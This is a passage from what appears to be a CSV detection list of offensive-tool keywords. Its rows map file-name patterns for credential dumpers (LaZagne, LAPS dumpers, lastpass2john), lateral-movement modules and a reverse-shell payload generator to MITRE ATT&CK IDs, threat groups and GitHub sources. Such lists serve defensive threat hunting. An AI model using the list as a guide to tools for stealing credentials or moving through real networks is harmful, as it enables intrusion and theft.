Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*LAPSDecrypt.*,offensive_tool_keyword,LAPSDecrypt,Quick POC looking at how encryption works for LAPS (v2),T1552.004,TA0003,N/A,N/A,Credential Access,https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Lapsdump.cna*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*Lapsdump.exe*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*LAPSDumper-main*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,1,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*LapsPasswords.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*LAPSToolkit*,offensive_tool_keyword,LAPSToolkit,Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). 
It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled,T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001,TA0007 - TA0008 - TA0009,N/A,N/A,Information Gathering,https://github.com/leoloobeek/LAPSToolkit,1,1,N/A,N/A,7,659,108,2018-01-31T14:45:35Z,2016-04-27T00:06:20Z -*LaresLLC/SlinkyCat*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,1,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*LasCC/Hack-Tools*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*lastpass.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass 
- Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*lastpass/process_lp_files.py*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*lastpass_sniffed_fmt_plug*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*lastpass2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Lateral/DCom.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - 
T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/PSExec.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/SMBClient.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/SMBClientDelete.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/SMBClientGet.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/SMBClientPut.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Lateral/WMIExec.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*lateral_wmi.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*LateralMovement_*_Exploit*.py,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_ExploitationOfRemoteServices_AuxiliaryMs17010.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z 
-*LateralMovement_ExploitationOfRemoteServices_MS17010.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_Other_Ladon.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_PassTheHash_ByInvokeWMIExec.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_PassTheHash_ByWmi.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet 
penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_PassTheTicket_ByPsexec.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_PassTheTicket_BySharpwmi.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*LateralMovement_PassTheTicket_ByWmi.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Launch Empire CLI*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*Launch Empire Server*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - 
T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*LaunchExploitMode.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*LaunchPreCompromise.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*layer8secure/SilentHound*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,1,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*Lazagne*Passwords.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*laZagne.exe browsers*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,0,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*Lazagne.exe*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*laZagne.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*Lazagne.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*LaZagneForensic*,offensive_tool_keyword,LaZagneForensic,Windows passwords decryption from dump files,T1003 - T1081 - T1082,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagneForensic,1,1,N/A,N/A,5,450,114,2023-02-02T16:36:21Z,2018-02-01T15:44:31Z -*LaZagne-master.zip*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*lazynmap.sh*,offensive_tool_keyword,LALIN,this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new,T1588,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/LALIN,1,1,N/A,N/A,4,350,164,2017-04-13T13:47:21Z,2016-06-10T07:53:49Z -*lazypariah *,offensive_tool_keyword,LAZYPARIAH,LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly,T1059 - T1566 - T1212 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/octetsplicer/LAZYPARIAH,1,0,N/A,N/A,2,136,30,2022-06-18T08:59:45Z,2020-11-20T05:08:36Z -*lazypariah.svg*,offensive_tool_keyword,LAZYPARIAH,LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly,T1059 - T1566 - T1212 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/octetsplicer/LAZYPARIAH,1,1,N/A,N/A,2,136,30,2022-06-18T08:59:45Z,2020-11-20T05:08:36Z -*lcmammnjlbmlbcaniggmlejfjpjagiia*,greyware_tool_keyword,Adblock Office VPN Proxy Server,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*ldap_enums.go*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z 
-*ldap_shell.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*ldapasn1.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ldapattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*ldapattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
